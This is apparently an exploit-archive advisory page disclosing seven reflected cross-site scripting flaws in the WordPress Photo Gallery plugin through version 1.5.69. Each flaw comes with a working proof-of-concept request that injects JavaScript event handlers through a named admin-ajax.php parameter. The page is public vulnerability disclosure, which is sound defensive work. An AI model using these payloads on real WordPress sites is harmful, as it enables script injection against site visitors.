WordPress Photo Gallery 1.5.69 Cross Site Scripting

WordPress Photo Gallery 1.5.69 Cross Site Scripting: Posted Apr 19, 2021; Authored by ThuraMoeMyint; WordPress Photo Gallery plugin versions 1.5.69 and below suffer from multiple reflective cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | f5cee129a211aee4e8107180c84597f0d60b54808dacf0f7a05afefadeaa5233; Download | Favorite | View

WordPress Photo Gallery 1.5.69 Cross Site Scripting

Researcher Name: ThuraMoeMyint
Twitter: https://twitter.com/mgthuramoemyint
Vendor Url: https://wordpress.org/plugins/photo-gallery/

"Photo Gallery by 10Web / Mobile-Friendly Image Gallery" (photo-gallery) Multiple RXSS

The parameter bwg_album_breadcrumb_0 is able to inject malicious javascript code.
Affected Version < 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'><img/src=x onerror=alert(1)>","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview

The parameter "shortcode_id" is able to inject malicious javascript.
Affected Version < 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=5&tag=0&album_id=0&theme_id=1&shortcode_id=9%22%20onmouseover=alert(id)//

The parameter "album_gallery_id_0" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&album_gallery_id_0=%27);}%20alert(1);//

The parameter "bwg_album_search_0" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_search_0=%22%20autofocus%20onfocus%3D%22alert(1)

The parameter "tag" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E

The parameter "type_0" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&type_0=%27);}%20alert(document.domain);//

The parameter "theme_id" is able to inject malicious javascript.
Affected Version <= 1.5.69

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E

Top Authors In Last 30 Days

Red Hat 136 files
Ubuntu 97 files
Debian 24 files
LiquidWorm 10 files
Google Security Research 10 files
Muhammad Navaid Zafar Ansari 7 files
Abdulhakim Oner 6 files
fearzzzz 5 files
nu11secur1ty 5 files
Ivan Fratric 5 files

File Archives

Systems

AIX (426)
Apple (1,951)
BSD (370)
CentOS (55)
Cisco (1,919)
Debian (6,710)
Fedora (1,691)
FreeBSD (1,242)
Gentoo (4,288)
HPUX (878)
iOS (338)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,054)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,874)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,426)
UNIX (9,205)
UnixWare (185)
Windows (6,530)
Other

WordPress Photo Gallery 1.5.69 Cross Site Scripting

WordPress Photo Gallery 1.5.69 Cross Site Scripting

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Photo Gallery 1.5.69 Cross Site Scripting

Share This

WordPress Photo Gallery 1.5.69 Cross Site Scripting

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems